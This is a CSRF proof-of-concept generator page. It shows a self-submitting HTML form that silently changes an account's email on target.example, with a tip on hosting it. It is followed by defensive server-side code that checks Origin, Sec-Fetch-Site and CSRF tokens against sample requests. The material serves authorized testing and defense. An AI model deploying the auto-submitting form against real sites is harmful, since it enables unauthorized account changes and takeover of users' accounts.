CSRF PoC generator

Turn a state-changing request into a self-submitting HTML form to demonstrate cross-site request forgery. Built entirely in your browser. For systems you are authorized to test.

PoC HTML
<!doctype html>
<html>
  <body>
    <!-- CSRF proof-of-concept — authorized testing only -->
    <form action="https://target.example/account/email" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="confirm" value="[email protected]" />

    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

Tip: host this with the payload host and point your target at it, or catch the resulting request with a request bin.
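For the defending side, the server-side checks that reject the request this PoC submits, as an added example that is not part of the generator or its output. The `csrf_token` form field, the `session.csrfToken` property, the request object shape and `payload.example` are assumptions made for illustration.

```javascript
// Added example, not part of the generator. Field and property names
// (csrf_token, session.csrfToken) and payload.example are assumptions.
const ALLOWED_ORIGIN = "https://target.example"; // origin of the PoC's form action
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Length-checked XOR compare so timing does not reveal how many characters
// matched (in Node, crypto.timingSafeEqual does this job).
function tokensMatch(expected, submitted) {
  if (typeof expected !== "string" || typeof submitted !== "string") return false;
  if (expected.length === 0 || expected.length !== submitted.length) return false;
  let diff = 0;
  for (let i = 0; i < expected.length; i++) diff |= expected.charCodeAt(i) ^ submitted.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers (lowercase keys), body (parsed form fields), session }
function checkCsrf(req) {
  if (SAFE_METHODS.has(req.method)) return { allowed: true, reason: "safe method" };
  // Fetch metadata: browsers that send it mark the PoC's submit "cross-site".
  const site = req.headers["sec-fetch-site"];
  if (site && site !== "same-origin" && site !== "none") {
    return { allowed: false, reason: "sec-fetch-site: " + site };
  }
  // Current browsers attach Origin to cross-origin form POSTs.
  const origin = req.headers["origin"];
  if (origin && origin !== ALLOWED_ORIGIN) {
    return { allowed: false, reason: "origin mismatch" };
  }
  // A page on another origin cannot read the session's token, so the PoC's
  // hidden fields cannot carry a valid one.
  if (!tokensMatch(req.session.csrfToken, req.body.csrf_token)) {
    return { allowed: false, reason: "missing or invalid token" };
  }
  return { allowed: true, reason: "ok" };
}

// Constructed sample requests (not captured traffic).
const session = { csrfToken: "constructed-sample-token-0123456789abcdef" };
const form = { email: "new@payload.example", confirm: "new@payload.example" };
const forged = { method: "POST", session, body: form,
  headers: { origin: "https://payload.example", "sec-fetch-site": "cross-site" } };
const forgedNoHeaders = { method: "POST", session, body: form, headers: {} };
const legit = { method: "POST", session,
  body: { ...form, csrf_token: session.csrfToken },
  headers: { origin: ALLOWED_ORIGIN, "sec-fetch-site": "same-origin" } };

for (const [name, r] of Object.entries({ forged, forgedNoHeaders, legit })) {
  console.log(name, checkCsrf(r));
}
```

The `forgedNoHeaders` case is the one to watch: a client that sends neither `Origin` nor `Sec-Fetch-Site` is stopped only by the token check, so the header checks supplement the token rather than replace it.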